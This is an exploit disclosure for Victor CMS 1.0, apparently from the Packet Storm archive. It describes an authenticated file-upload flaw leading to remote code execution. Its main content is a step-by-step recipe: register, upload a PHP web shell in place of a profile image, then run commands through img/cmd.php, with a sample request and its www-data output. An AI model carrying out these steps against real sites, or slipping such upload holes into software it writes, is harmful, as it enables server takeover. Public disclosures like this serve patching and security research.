Victor CMS version 1.0 suffers from an authenticated remote shell upload vulnerability. A shell upload vulnerability in this version was originally discovered in May of 2020 by Kishan Lal Choudhary.
78d81439c6c905be79bc0ad5292ae2029a5f1396f03e8ad78ae9838806039e96# Exploit Title: Victor CMS 1.0 - File Upload To RCE
# Date: 20.12.2020
# Exploit Author: Mosaaed
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
# Version: 1.0
# Tested on: Apache2/Linux
Step1: register http://localhost/CMSsite-master/register.php
step2: login as user
step3: Go to Profile
step4: upload imag as php file (upload shell.php)
step5: update user
step6: You will find your shell in img folder :/path/img/cmd.php
http://localhost/CMSsite-master/img/cmd.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed